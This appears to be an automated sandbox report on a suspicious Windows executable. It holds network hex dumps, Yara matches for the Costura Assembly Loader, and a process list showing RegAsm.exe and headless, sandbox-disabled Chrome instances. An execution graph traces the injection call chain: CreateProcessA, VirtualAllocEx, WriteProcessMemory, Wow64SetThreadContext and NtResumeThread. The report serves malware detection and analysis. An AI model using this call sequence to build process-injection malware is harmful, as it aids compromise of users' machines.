                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: ec 5b ba a1 ad f4 7e b4 36 22 6b 2a 3a ea b1 10 bb 5a d2 82 b3 0d ce 73 7e 0e e7 48 44 3b 1f 73 dd 54 69 30 7d cb f8 b3 28 bf 32 cd a8 91 6d 34 ad bb 0e d6 22 89 e7 eb 96 b3 8a bc 59 04 0a 5e bc 0b 94 99 3b ef f8 9c bb b7 31 08 30 50 61 9f 34 7d fc aa 6a 32 22 64 fa 76 01 58 be a6 de 25 8f 4c df ca 78 6c 2b 26 9a 9a 4a 74 8f a6 d3 ed aa 44 e2 79 8f 57 ad 97 78 47 09 43 fb f6 b2 69 ae fa ed 0e a6 c8 bc 2d 77 e5 1a be 7a c9 bf 7a 38 df 8f 7f 89 5f 71 93 cd f1 3e a1 da 7c 03 1a 34 f3 b5 5b 8e 92 80 7b dc 29 5e 24 de 2a fe 87 0a 59 f2 e5 dc f9 04 df 73 8a c3 c5 46 cd eb bd 03 6e a2 52 ca 4d 3c 42 8a 91 90 5a 49 6b 4e fc c5 eb 6a e7 27 5f d7 d9 92 eb 99 80 dd 9e 5b 65 18 f5 33 5f 86 4c f2 90 bb f6 e7 d2 ac 36 6f 13 62 f5 9b 39 9d 78 c6 6f 1e a6 9f 96 13 48 6b
                                                                                                                                                                                          Data Ascii: [~6"k*:Zs~HD;sTi0}(2m4"Y^;10Pa4}j2"dvX%Lxl+&JtDyWxGCi-wzz8_q>|4[{)^$*YsFnRM<BZIkNj'_[e3_L6ob9xoHk
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: e0 22 b7 3c 63 7a e6 a3 86 23 e7 30 2c a5 42 31 a2 ae 1d 00 01 77 ff 02 a6 f0 eb 0b 87 ba f9 f4 b0 9c 8b e6 cf 6e 16 c7 b8 4c f1 8c b4 47 9e 54 c6 be 45 47 91 4e 78 c0 25 c3 da 17 f4 70 5a ff 27 b0 83 21 21 a0 e4 ae fa e7 11 5b d1 a2 1b 58 46 ba 4f bb ee 07 59 6e f4 ab 0a 81 03 c1 db 6d e1 39 50 02 d9 13 3a ab 49 21 bc e7 4b f7 77 6a 95 6b 49 fb ce 2e 4c aa 8c 55 4e a9 ed f2 4b ba 33 65 99 89 da 5f 69 11 cd d0 da 26 9d ba bf 75 33 7c 68 ce 52 23 f7 6e bc 71 bd c0 f4 4c 0b 5d 99 f0 e8 ca 66 97 be 7a a9 35 72 a3 de 49 98 95 65 3a c9 e6 ee 0c cd 45 69 a7 49 e7 1e fb 4f 4f 15 f7 a3 06 9f 47 bd ab 57 ad de 78 c8 98 dc 16 dc f3 dc dc 55 83 32 68 7c fe e1 8e ea 62 90 73 ac a2 96 77 af 48 45 bf 78 17 b3 09 a7 a0 ca 83 66 1e 5a d1 e5 90 4f 7e a6 0b 01 21 3a 95 a5
                                                                                                                                                                                          Data Ascii: "<cz#0,B1wnLGTEGNx%pZ'!![XFOYnm9P:I!KwjkI.LUNK3e_i&u3|hR#nqL]fz5rIe:EiIOOGWxU2h|bswHExfZO~!:
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 32 1b 0a 18 02 7a 78 07 ff b7 e4 2c d8 df 5c 0f 2a b6 bb 00 9c 87 d0 82 ba 63 31 84 2a c7 46 98 eb 69 7b ca ce 9c e6 4a 57 82 55 9d 16 93 e4 b5 57 d0 fa 9c 13 8a fb e0 26 aa cb 42 66 b1 8c b9 47 81 8f 78 e3 fb 48 3f d3 f1 e2 b2 3b da 37 b9 e7 72 09 2f 28 74 c5 3e 08 59 00 a5 23 c9 e2 00 24 d9 ad 9f 24 21 fe a8 3a df 1f 25 21 0e a8 2a 9b 7f 22 09 51 ff 59 12 22 01 43 82 45 51 0d 42 bf 2f 09 89 de 9f 4c c9 db 61 c0 ef 3e d3 70 fe f1 53 0b 5c 79 ac ed 1b 14 3c 55 e6 4d a6 39 95 45 ed 70 7c 08 dc 92 bb c1 42 6b e0 27 49 08 37 a7 00 02 f1 4d 12 f2 3a 2b a0 03 08 78 f1 a7 6c c7 af 6c 11 f6 71 b6 48 c2 c1 c2 15 65 9e c7 e2 24 04 13 c0 70 d4 8d da 51 c3 da c6 c2 de fc 1b fb 24 28 0d 00 1c 00 9f 0c c0 21 2d c4 2b f0 af 6b 41 16 01 24 3a 0d 80 44 c3 38 a6 05 59 7f
                                                                                                                                                                                          Data Ascii: 2zx,\*c1*Fi{JWUW&BfGxH?;7r/(t>Y#$$!:%!*"QY"CEQB/La>pS\y<UM9Ep|Bk'I7M:+xllqHe$pQ$(!-+kA$:D8Y
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 7c 24 f8 a0 ce fd 7a 40 64 78 d4 ba d0 e2 f2 bf a4 fc f8 e2 50 c0 60 d0 a5 93 cd 3c de 94 69 0f 58 bd 36 18 c4 18 88 b1 82 8a 48 29 e9 2a 82 cf 65 09 86 26 8b dc 0b 7d bc be 1c f4 58 aa f5 29 c8 ea 5a 78 49 52 be 34 5b fd 1e 8f 4e 87 e0 ce 85 57 93 e2 f3 cf 81 d3 11 8f a5 b2 a4 79 d3 68 e4 07 e8 4e 36 bd 4c 8d 0d 77 9b 0b de f5 6b e4 6f e1 7f cd 83 97 50 96 71 e7 35 a7 8f 91 df 93 06 62 9c c9 b1 75 aa 1e 01 c3 a0 d1 c7 1f 72 06 82 e0 58 00 02 d7 0a cd a4 eb a5 3e 5d c7 86 55 ab e9 22 f1 63 09 2d 9d 13 3e 49 38 57 5c d8 83 67 c1 75 c5 48 f3 65 71 9a a2 b0 a6 47 e8 32 13 f5 41 d5 cc 6d 22 a3 c4 bb 85 55 d2 db 8a a2 79 30 ce 1e a7 f3 90 19 ec 12 95 c4 54 46 a6 8f 96 54 04 f3 6d 0c 27 c7 22 b3 1e f0 47 da b5 bb ec 28 a7 bb 79 3e 7f 40 cc 97 48 c3 94 f8 d8 df
                                                                                                                                                                                          Data Ascii: |$z@dxP`<iX6H)*e&}X)ZxIR4[NWyhN6LwkoPq5burX>]U"c->I8W\guHeqG2Am"Uy0TFTm'"G(y>@H
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a9 9d 26 b6 7a 21 ff 73 7a 7d 44 18 6d a3 7f b8 a4 78 23 38 6f 6b cd 97 ef 3f 75 99 b5 f5 2a e7 7c f9 a2 de ed d8 f1 6e 7b d7 b0 43 9c ac ff 11 e2 94 7d 61 09 b5 51 4e 0f 1b 03 13 b4 e1 92 7e 9e 6b d5 a1 e0 c3 e3 f1 92 12 81 23 1d 9e 5b 8c 83 b9 a6 f2 ce fc 34 44 06 ee 97 6a 1a ad 7a 2a 89 47 bd 67 a2 d1 1b 21 b0 95 e8 29 23 38 98 10 56 c4 12 82 e9 48 03 14 04 7f bf 70 42 b6 d9 b6 04 1b 03 9c 67 15 67 02 d2 9d 6a ae 97 5b 7d 39 7e 4d a2 c1 ac 9f 7c 54 6e 51 8b bf 3d a5 80 c1 91 a9 64 bb 20 52 b5 85 97 b4 95 50 0a 41 6e 51 f1 ca cb 97 e4 bf 2a 74 93 cf a7 ba 48 88 0c 5f 19 af 70 7d 15 f1 9f 24 d6 9c 85 c7 06 de 82 3c 2b c3 8b fc 4e 4e e9 0e fa 79 68 26 98 fa e0 d5
                                                                                                                                                                                          Data Ascii: "0*H0&z!sz}Dmx#8ok?u*|n{C}aQN~k#[4Djz*Gg!)#8VHpBggj[}9~M|TnQ=d RPAnQ*tH_p}$<+NNyh&
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 55 70 64 61 74 65 20 53 69 67 6e 69 6e 67 20 43 41 20 32 2e 33 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ac 39 80 cb 34 50 ca 26 3f 5d 76 26 ca d3 8c c1 1d 5c eb 30 97 c6 66 86 26 a6 d5 5d 5f 4f cd 80 4c 0f 67 ec 25 0c bb 39 11 3b 6e 86 fd c7 21 27 60 fc 80 7c 01 89 ad e8 6e cd bd d0 47 5f 58 6d 00 3b 46 57 99 7d 16 b3 76 12 8b ca 9d 86 6c 1d 70 9a 69 d4 45 fe ce 72 ea ca ca 94 60 9d 7c 73
                                                                                                                                                                                          Data Ascii: 10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Update Signing CA 2.30"0*H094P&?]v&\0f&]_OLg%9;n!'`|nG_Xm;FW}vlpiEr`|s


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:22:31:22
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe"
                                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                                          File size:11'264 bytes
                                                                                                                                                                                          MD5 hash:09BB5446AD9055B9A1CB449DB99A7302
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1468133567.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1476454354.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:22:31:49
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                          Imagebase:0x3b0000
                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                          Start time:22:31:58
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew"
                                                                                                                                                                                          Imagebase:0x7ff786830000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                          Start time:22:31:58
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1b4f38,0x7ffc9d1b4f44,0x7ffc9d1b4f50
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                          Start time:22:31:58
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3
                                                                                                                                                                                          Imagebase:0x7ff786830000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                          Start time:22:32:04
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:2
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                          Start time:22:32:09
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=160482786 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:1
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                          Start time:22:32:14
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155327286 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:1
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                          Start time:22:32:24
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155781375 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:1
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                          Start time:22:32:31
                                                                                                                                                                                          Start date:13/05/2025
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:8
                                                                                                                                                                                          Imagebase:0x7ffc99900000
                                                                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:6.4%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                            Signature Coverage:7%
                                                                                                                                                                                            Total number of Nodes:86
                                                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                                                            execution_graph 20154 53e0fbe 20155 53e0fcd 20154->20155 20159 53e52d8 20155->20159 20163 53e52e0 20155->20163 20156 53e1069 20160 53e52e0 WriteProcessMemory 20159->20160 20162 53e53c5 20160->20162 20162->20156 20164 53e532c WriteProcessMemory 20163->20164 20166 53e53c5 20164->20166 20166->20156 20167 53e12be 20169 53e017e 20167->20169 20168 53e00b5 20169->20168 20172 53e5959 20169->20172 20176 53e5960 20169->20176 20173 53e5960 NtResumeThread 20172->20173 20175 53e5a00 20173->20175 20175->20169 20177 53e59a9 NtResumeThread 20176->20177 20179 53e5a00 20177->20179 20179->20169 20201 53e0dee 20202 53e0e06 20201->20202 20209 53e192a 20202->20209 20213 53e1930 20202->20213 20203 53e00b5 20204 53e017e 20204->20203 20207 53e5959 NtResumeThread 20204->20207 20208 53e5960 NtResumeThread 20204->20208 20207->20204 20208->20204 20210 53e1930 20209->20210 20211 53e1969 20210->20211 20217 53e2145 20210->20217 20211->20204 20214 53e1947 20213->20214 20215 53e1969 20214->20215 20216 53e2145 2 API calls 20214->20216 20215->20204 20216->20215 20218 53e2154 20217->20218 20222 53e326a 20218->20222 20226 53e3270 20218->20226 20223 53e3270 CreateProcessA 20222->20223 20225 53e34ec 20223->20225 20227 53e32f0 CreateProcessA 20226->20227 20229 53e34ec 20227->20229 20180 53e093a 20181 53e0949 20180->20181 20188 53e5008 20181->20188 20192 53e5010 20181->20192 20182 53e00b5 20183 53e017e 20183->20182 20186 53e5959 NtResumeThread 20183->20186 20187 53e5960 NtResumeThread 20183->20187 20186->20183 20187->20183 20189 53e5010 VirtualAllocEx 20188->20189 20191 53e50cc 20189->20191 20191->20183 20193 53e5054 VirtualAllocEx 20192->20193 20195 53e50cc 20193->20195 20195->20183 20196 53e1339 20197 53e133f 20196->20197 20199 53e5008 VirtualAllocEx 20197->20199 20200 53e5010 VirtualAllocEx 20197->20200 20198 53e142b 20199->20198 20200->20198 20230 53e0c29 20231 53e0c38 20230->20231 20238 53e4928 20231->20238 20242 53e4930 20231->20242 20232 53e00b5 20233 53e017e 20233->20232 20236 53e5959 NtResumeThread 20233->20236 20237 53e5960 NtResumeThread 20233->20237 20236->20233 20237->20233 20239 53e4930 Wow64SetThreadContext 20238->20239 20241 53e49f1 20239->20241 20241->20233 20243 53e4979 Wow64SetThreadContext 20242->20243 20245 53e49f1 20243->20245 20245->20233 20246 53e0d16 20247 53e0d1c 20246->20247 20252 53e52d8 WriteProcessMemory 20247->20252 20253 53e52e0 WriteProcessMemory 20247->20253 20248 53e00b5 20249 53e017e 20249->20248 20250 53e5959 NtResumeThread 20249->20250 20251 53e5960 NtResumeThread 20249->20251 20250->20249 20251->20249 20252->20249 20253->20249 20254 53e0a14 20255 53e0a1c 20254->20255 20257 53e4928 Wow64SetThreadContext 20255->20257 20258 53e4930 Wow64SetThreadContext 20255->20258 20256 53e0a53 20257->20256 20258->20256 20259 53e0490 20263 53e049f 20259->20263 20260 53e0232 20261 53e52d8 WriteProcessMemory 20261->20260 20262 53e52e0 WriteProcessMemory 20262->20260 20263->20261 20263->20262

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 048BACAC Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 0 48bacac-48bacd2 1 48bacd9-48bace0 0->1 2 48bacd4 0->2 3 48baceb-48baf5e 1->3 2->1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 4'q$4'q
                                                                                                                                                                                            • API String ID: 0-1467158625
                                                                                                                                                                                            • Opcode ID: dcfa709c41782c068b5adfb1ed87235ad8c3dcbb77f616d17d827f467b9ed6c7
                                                                                                                                                                                            • Instruction ID: 4680357e9f4ac4b465a75f52005ec27dbb8ab1d7254fe8e090e0f65c4c4064c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: dcfa709c41782c068b5adfb1ed87235ad8c3dcbb77f616d17d827f467b9ed6c7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A710770E142098FDB08EF6AF88579EBBF3BBC9300F14C569D405AB269DB7459069F41
                                                                                                                                                                                            Function 048BACB8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 33 48bacb8-48bacd2 34 48bacd9-48bace0 33->34 35 48bacd4 33->35 36 48baceb-48baf5e 34->36 35->34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 4'q$4'q
                                                                                                                                                                                            • API String ID: 0-1467158625
                                                                                                                                                                                            • Opcode ID: 314cb5711b69144f278f8621002f93eae96384b95a5fb6cd5d49a16d2bab67c8
                                                                                                                                                                                            • Instruction ID: 4034688d4f30a90059a3b341fad2ffd4e41c4fa84cdeaf00c36b56ee4511e24e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 314cb5711b69144f278f8621002f93eae96384b95a5fb6cd5d49a16d2bab67c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2710670E142088FDB08EF6AF88579EBBF2BBC9300F14C569D405AB268EB7459069F51
                                                                                                                                                                                            Function 053E5959 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 053E59EE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                            • Opcode ID: b130230891fea6943d734c65456ad1526ea3c76fdd70291f6fd7292af1fd1be8
                                                                                                                                                                                            • Instruction ID: 4ff2b4c52d87fdb58d10fdcc0172dbe3c4ec12b883bd4ba10dc59fc1d5b72f12
                                                                                                                                                                                            • Opcode Fuzzy Hash: b130230891fea6943d734c65456ad1526ea3c76fdd70291f6fd7292af1fd1be8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9331CAB5D112189FDB14CFAAD880AEEFBF5BB48310F10942AE805B7240C739A905CFA4
                                                                                                                                                                                            Function 053E5960 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
